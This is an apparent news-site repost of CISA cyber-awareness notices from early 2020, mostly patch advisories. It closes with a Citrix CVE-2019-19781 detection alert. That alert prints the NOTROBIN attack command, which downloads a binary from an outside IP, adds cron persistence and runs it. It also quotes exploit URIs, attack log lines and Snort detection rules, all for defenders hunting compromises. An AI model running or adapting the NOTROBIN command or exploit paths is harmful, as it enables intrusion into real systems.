HGN Alerts

Home ] [ NEW ORLEANS ] [ HU SHOPPING ] [ HGN White House ] [ HGN U.S. CONGRESS ] [ HGN Alerts ] [ HGN News America ] [ HGN International ] [ HGN Financial ] [ HGN SouthWest ] [ HGN Editorial ] [ HGN Recalls/Safety ] [ HU Shalom 2 ] [ HU Shalom Medical ] [ HGN WEATHER ] [ HGN Nat'l Hazard ] [ HGN Hurricane ] [ HGN Marine Flood Data ][ HGN Nat'l Radar ] [ IntraHuman ] [ HGN Voyage ] [ HGN Time Zone ] [ HGN Auto ] [ HU Gulf ] [ HU Premiere ] [ HU Canon ] [ NEWS ARCHIVES ] [ RELATED LINKS ] [ Rights/Privacy/Refunds ][ CONTACT ] [ Foundation Page ] ] 

"My people are destroyed for lack of knowledge...." Hosea 4:6-7

The natural, inalienable rights and legal rights of the citizenry to be accurately informed must not, by corruption, be perverted, lest that citizenry, acting on such perversion in their daily judgments, certainly suffer to their physical and spiritual detriment.

©2014 Edgar Rogers-Chairman 

hgn.news

HGNAlertSM

NATIONAL/INTERNATIONAL/GALACTIC ALERTS AND EMERGENCY SITUATIONS

HGN News Journal™ "No Secret Hid That Won't Be Revealed"™

HGN News®    2020©All Rights Reserved

"For nothing is secret, that shall not be made manifest; neither any thing hid, that shall not be known and come abroad."  Luke 8:17 

"Every government degenerates when trusted to the rulers of the people alone. And even under the best forms, those entrusted with power have, in time and by slow operations, perverted it into tyranny."                             Thomas Jefferson

"...without active protest and petition, there is no protection against corrupt government and a corrupt society."     Homer Rogers/Edgar Rogers


 

 

All information is as is provided by the entity so providing and the presentation here does not constitute any endorsement by HGN News or by that entity of HGN News.

HGN News “No Truth Hid That Won’t Be Revealed”™

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

04/02/2020 11:39 AM EDT
Original release date: April 2, 2020

The Federal Bureau of Investigation (FBI) has released an article on defending against video-teleconferencing (VTC) hijacking (referred to as “Zoom-bombing” when attacks are to the Zoom VTC platform).  Many organizations and individuals are increasingly dependent on VTC platforms, such as Zoom and Microsoft Teams, to stay connected during the Coronavirus Disease 2019 (COVID-19) pandemic. The FBI has released this guidance in response to an increase in reports of VTC hijacking.

The Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the FBI article as well as the following steps to improve VTC cybersecurity:

  • Ensure meetings are private, either by requiring a password for entry or controlling guest access from a waiting room.
  • Consider security requirements when selecting vendors. For example, if end-to-end encryption is necessary, does the vendor offer it?
  • Ensure VTC software is up to date. See Understanding Patches and Software Updates.

CISA also recommends the following VTC cybersecurity resources:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

04/01/2020 01:24 PM EDT
Original release date: April 1, 2020

The Multi-State Information Sharing & Analysis Center (MS-ISAC) has released an advisory regarding two vulnerable command injection points in DrayTek devices (CVE-2020-8515). An attacker could exploit these vulnerabilities to take control of an affected system. These vulnerabilities were detected in exploits in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review MS-ISAC Advisory 2020-043 and the DrayTek Security Advisory for CVE-2020-8515 and apply the necessary updates and mitigations.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

04/01/2020 10:48 AM EDT
Original release date: April 1, 2020

Google has released Chrome version 80.0.3987.162 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/25/2020 10:31 AM EDT
Original release date: March 25, 2020

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.


 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/23/2020 06:37 PM EDT
Original release date: March 23, 2020

Microsoft has released a security advisory to address remote code execution vulnerabilities in Adobe Type Manager Library affecting all currently supported versions of Windows and Windows Server operating systems. A remote attacker can exploit these vulnerabilities to take control of an affected system. Microsoft is aware of limited, targeted attacks exploiting these vulnerabilities in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200006 and the CERT Coordination Center (CERT/CC) Vulnerability Note VU#354840 for more information and apply the necessary mitigations until patches are made available.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/19/2020 11:23 AM EDT
Original release date: March 19, 2020

Google has released Chrome version 80.0.3987.149 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

 

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/19/2020 11:31 AM EDT
Original release date: March 19, 2020

Drupal has released security updates to address vulnerabilities affecting Drupal 8.7.x and 8.8.x. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Drupal security release and apply the necessary updates or mitigations.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/19/2020 11:26 AM EDT
Original release date: March 19, 2020

Cisco has released security updates to address multiple vulnerabilities in SD-WAN Solution software. An attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/18/2020 11:26 AM EDT
Original release date: March 18, 2020

Adobe has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/16/2020 11:09 AM EDT
Original release date: March 16, 2020

VMware has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0004 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/13/2020 08:08 AM EDT
Original release date: March 13, 2020

Summary

As organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise virtual private network (VPN) solution to connect employees to an organization’s information technology (IT) network. As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity.

Technical Details

The following are cybersecurity considerations regarding telework.

  • As organizations use VPNs for telework, more vulnerabilities are being found and targeted by malicious cyber actors.
  • As VPNs are 24/7, organizations are less likely to keep them updated with the latest security updates and patches.
  • Malicious cyber actors may increase phishing emails targeting teleworkers to steal their usernames and passwords.
  • Organizations that do not use multi-factor authentication (MFA) for remote access are more susceptible to phishing attacks.
  • Organizations may have a limited number of VPN connections, after which point no other employee can telework. With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks.

Mitigations

CISA encourages organizations to review the following recommendations when considering alternate workplace options.

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices.
  • Alert employees to an expected increase in phishing attempts. See CISA Tip Avoiding Social Engineering and Phishing Attacks.
  • Ensure IT security personnel are prepared to ramp up the following remote access cybersecurity tasks: log review, attack detection, and incident response and recovery. Per the National Institute of Standards and Technology (NIST) Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security, these tasks should be documented in the configuration management policy.
  • Implement MFA on all VPN connections to increase security. If MFA is not implemented, require teleworkers to use strong passwords. (See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.)
  • Ensure IT security personnel test VPN limitations to prepare for mass usage and, if possible, implement modifications—such as rate limiting—to prioritize users that will require higher bandwidths.
  • Contact CISA to report incidents, phishing, malware, and other cybersecurity concerns.

References

Revisions

  • March 13, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/12/2020 01:35 PM EDT
Original release date: March 12, 2020

Microsoft has released out-of-band security updates to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker could exploit this vulnerability to take control of an affected system.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates or workarounds.
•    Microsoft Security Guidance for CVE-2020-0796
•    Microsoft Advisory ADV200005
•    CERT Coordination Center’s Vulnerability Note VU#872016

This product is provided subject to this Notification and this Privacy & Use policy.


 

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/10/2020 01:41 PM EDT
Original release date: March 10, 2020

Microsoft Exchange Servers affected by a remote code execution vulnerability, known as CVE-2020-0688, continue to be an attractive target for malicious cyber actors. A remote attacker can exploit this vulnerability to take control of an affected system that is unpatched.

Although Microsoft disclosed the vulnerability and provided software patches for the various affected products in February 2020, advanced persistent threat actors are targeting unpatched servers, according to recent open-source reports. The Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators review Microsoft’s Advisory and the National Security Agency’s tweet on CVE-2020-0688 for more information and apply the necessary patches as soon as possible.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/10/2020 01:24 PM EDT
Original release date: March 10, 2020

Intel has released security updates to address vulnerabilities in multiple products. An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/10/2020 01:40 PM EDT
Original release date: March 10, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s March 2020 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/11/2020 12:05 PM EDT
Original release date: March 11, 2020

Microsoft has released a security advisory to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker can exploit this vulnerability to take control of an affected system. SMB is a network file-sharing protocol that allows client machines to access files on servers.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200005 and the CERT Coordination Center’s Vulnerability Note VU#872016 and apply the workaround until patches are made available.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/06/2020 03:42 PM EST
Original release date: March 6, 2020

Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.

The Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the Zoho security update for more information and apply the patch.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/06/2020 01:53 PM EST
Original release date: March 6, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) warns individuals to remain vigilant for scams related to Coronavirus Disease 2019 (COVID-19). Cyber actors may send emails with malicious attachments or links to fraudulent websites to trick victims into revealing sensitive information or donating to fraudulent charities or causes. Exercise caution in handling any email with a COVID-19-related subject line, attachment, or hyperlink, and be wary of social media pleas, texts, or calls related to COVID-19.

CISA encourages individuals to remain vigilant and take the following precautions.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/05/2020 11:44 AM EST
Original release date: March 5, 2020

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Point-to-Point Protocol Daemon versions 2.4.2 through 2.4.8. A remote attacker can exploit this vulnerability to take control of an affected system. Point-to-Point Protocol Daemon is used to establish internet links such as those over dial-up modems, DSL connections, and Virtual Private Networks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC’s Vulnerability Note VU#782301 for more information and apply the necessary patches provided by software vendors.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/05/2020 11:49 AM EST
Original release date: March 5, 2020

Cisco has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/05/2020 04:29 PM EST
Original release date: March 5, 2020

The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an advisory on securing internet-connected cameras such as smart security cameras and baby monitors. An attacker could gain access to unsecured, or poorly secured, internet-connected cameras to obtain live feeds or images.

The following steps can help consumers secure their devices.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the NCSC advisory for more information and refer to CISA’s Tips on Securing the Internet of Things and Home Network Security for additional ways to secure internet-connected devices.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

03/04/2020 10:40 AM EST
Original release date: March 4, 2020

 

The Australian Cyber Security Centre (ACSC) has released a cybersecurity guide outlining strategies for identifying and minimizing risks to web servers from installed content management systems (CMS). This guidance provides effective mitigation strategies organizations can use to better protect their external-facing systems from cyber network exploitation.

 

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review ACSC’s Securing Content Management Systems to learn how to improve CMS security.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/28/2020 10:48 AM EST
Original release date: February 28, 2020

National Consumer Protection Week (NCPW) is March 1–7. This annual event encourages individuals and businesses to learn about their consumer rights and how to keep themselves secure. The Federal Trade Commission (FTC) and its NCPW partners provide free resources to protect consumers from fraud, scams, and identity theft.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages consumers to review FTC’s NCPW resource page and review the following CISA tips:

 

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/25/2020 11:19 AM EST
Original release date: February 25, 2020

Google has released Chrome version 80.0.3987.122 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/25/2020 05:04 PM EST
Original release date: February 25, 2020

OpenSMTPD has released version 6.6.4p1 to address a critical vulnerability. A remote attacker could exploit this vulnerability to take control of an affected server. OpenSMTPD is an open-source server-side implementation of the Simple Mail Transfer Protocol (SMTP) that is part of the OpenBSD Project.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to apply the necessary update. For OpenBSD implementations, binary patches are available through syspatch; see OpenSMTPD’s Message 04888 for further instruction. For other systems, the update is available at OpenSMTPD’s GitHub release page.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/26/2020 02:24 PM EST
Original release date: February 26, 2020

MITRE has released version 4.0 of the community-developed Common Weakness Enumeration (CWE) list. Previous CWE list versions describe common software security weaknesses. With version 4.0, the CWE list expands to include hardware security weaknesses. Additionally, version 4.0 simplifies the presentation of weaknesses into various views and adds a search function to enable easier navigation of the information.

The Cybersecurity and Infrastructure Security Agency (CISA) sponsors MITRE’s CWE program, which is a community-based initiative. CISA welcomes new partners to the CWE program. Visit https://cwe.mitre.org to learn how to get involved.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/27/2020 11:02 AM EST
Original release date: February 27, 2020

Cisco has released security updates to address vulnerabilities affecting FXOS, NX-OS, and Unified Computing System (UCS) software. A remote attacker could exploit some of these vulnerabilities to cause a denial-of-service condition. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories, as well as the Cisco Event Response page, and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/21/2020 12:04 PM EST
Original release date: February 21, 2020

Google has released Chrome version 80.0.3987.116 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. Note: although Google published an entry on these updates on Tuesday, February 18, the associated Common Vulnerabilities and Exposures numbers and descriptions appeared on the entry today, Friday, February 21.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/20/2020 10:42 AM EST
Original release date: February 20, 2020

Adobe has released security updates to address vulnerabilities in After Effects and Media Encoder. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletins APSB20-09 and APSB20-10 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/20/2020 10:55 AM EST
Original release date: February 20, 2020

Cisco has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/19/2020 01:30 PM EST
Original release date: February 19, 2020

VMware has released security updates to address multiple vulnerabilities in vRealize Operations for Horizon Adapter. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0003 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/11/2020 02:14 PM EST
Original release date: February 11, 2020

Intel has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/11/2020 03:12 PM EST
Original release date: February 11, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s February 2020 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/11/2020 11:16 AM EST
Original release date: February 11, 2020

Adobe has released security updates to address vulnerabilities in multiple Adobe products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/11/2020 11:10 AM EST
Original release date: February 11, 2020

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Mozilla Security Advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/06/2020 02:13 PM EST
Original release date: February 6, 2020

The Australian Cyber Security Centre (ACSC) has released an advisory on Mailto ransomware incidents. The ACSC has limited information regarding the initial intrusion vector for Mailto, also known as Kazakavkovkiz, but evidence suggests that Mailto actors may have used phishing and password spray attacks to comprise user accounts. The ACSC provides recommendations for users to detect and mitigate these types of attacks and assist with limiting their spread within networks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory on Mailto ransomware incidents and CISA’s Tip on Protecting Against Ransomware for more information.

 

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/06/2020 12:11 PM EST
Original release date: February 6, 2020

Cisco has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories, as well Vulnerability Note #261385 from the CERT Coordination Center (CERT/CC), and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/04/2020 10:53 AM EST
Original release date: February 4, 2020

The Internal Revenue Service (IRS) has launched its “Identity Theft Central” webpage to provide 24/7 access to online information regarding tax-related identity theft and data security protection. Tax-related identity theft occurs when someone steals personal information to commit tax fraud.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages taxpayers, tax professionals, and businesses to review the IRS news release and CISA’s Tip on Preventing and Responding to Identity Theft for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

02/05/2020 11:32 AM EST

Original release date: February 5, 2020

Google has released Chrome 80 (version 80.0.3987.87) for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/31/2020 01:07 PM EST
Original release date: January 31, 2020

Summary

Unknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[1]

Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.

Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.

Contact CISA, or the FBI to report an intrusion or to request assistance.

 

Technical Details

Detection

CISA has developed the following procedures for detecting a CVE-2019-19781 compromise. 

HTTP Access and Error Log Review

Context: Host Hunt

Type: Methodology

The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.

  • '*/../vpns/*'
  • '*/vpns/cfg/smb.conf'
  • '*/vpns/portal/scripts/newbm.pl*'
  • '*/vpns/portal/scripts/rmbm.pl*'
  • '*/vpns/portal/scripts/picktheme.pl*'

Note: These URIs were observed in Security Information and Event Management detection content provided by https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml.[2]

Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like.[3]

10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"

Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity.[4]

grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1
grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1

Running Processes Review

Context: Host Hunt

Type: Methodology

Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors.

ps auxd | grep nobody

Analysts should review the ps output for suspicious entries such as this:

nobody    63390  0.0  0.0  8320    16  ??  I     1:35PM   0:00.00 | | `– sh -c uname & curl -o – http://10.1.1.2/backdoor

Further pivoting can be completed using the Process ID from the PS output:

lsof -p <pid>

Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process.

Checking for NOTROBIN Presence

Context: Host Hunt

Type: Methodology

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k

hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o

/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *

/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

The above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job.

Running the command find / -name ".init" 2> /tmp/error.log should return the path to the created staging directory while taking all of the errors and creating a file located at /tmp/error.log.

Additional /var/log Review

Context: Host Hunt

Type: Methodology

Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) on and should try to identify any suspicious commands that may have been run, such as whoami or curl. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.

bash.log

Sample Log Entry:

Jan 10 13:35:47

<local7.notice> ns bash[63394]: nobody on /dev/pts/3

shell_command="hostname"

Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity.

sh.log

notice.log

Check Crontab for Persistence

Context: Host Hunt

Type: Methodology

As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a httpd process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:

crontab -l -u nobody

Existence of Unusual Files

Context: Host Hunt

Type: Methodology

Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.

  • /netscaler/portal/templates
  • /var/tmp/netscaler/portal/templates

Snort Alerts

Context: Network Alert

Type: Signatures

Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)
 
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7;
 
content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0;
content:"|0d0a|Connection: Keep-Alive";
content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6
 
a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74
 
2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534
 
3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

Suspicious Network Traffic

Context: Network Hunt

Type: Methodology

